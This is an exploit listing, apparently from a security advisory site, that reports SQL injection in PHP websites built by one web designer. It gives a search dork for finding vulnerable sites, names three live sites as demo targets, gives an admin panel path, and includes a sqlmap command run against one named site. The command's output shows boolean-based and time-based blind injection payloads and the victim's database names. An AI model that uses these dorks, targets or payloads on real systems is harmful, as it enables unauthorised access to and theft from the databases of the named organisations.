Website designed & developed by designrz. SQL Injection vulnerability

2019.07.07
sa H9xHacker (SA) sa
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title:Website designed & developed by designrz. SQL Injection vulnerability # Date:07.07.2019 # Dork:inurl:.php?id= intext:website designed & developed by designrz. # Exploit Author:H9xHacker # Tested on:Linux Reverse check bing.com ip:170.10.164.63 .php?id= (This server contains 236 domains) #Demo iskconamritsar.com/programs2.php?id=11 admissionoverseas.com/book-appointment.php?id=41 dcmgroup.in/education.php?id=7 # Admin control panel path site/com/cms/index.php # Poc: sqlmap.py --level=5 --risk=3 --timeout=10 --threads=10 --random-agent -u 'www.iskconamritsar.com/programs2.php?id=24' --no-cast --batch --dbs --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: id=-6246' OR 9878=9878-- cSiP Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=24' AND SLEEP(5)-- SiPf --- web application technology: Apache back-end DBMS: MySQL >= 5.0.12 available databases [2]: [*] information_schema [*] iskconas_iskcon ---------------------------------- Greets:And All My Friends


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top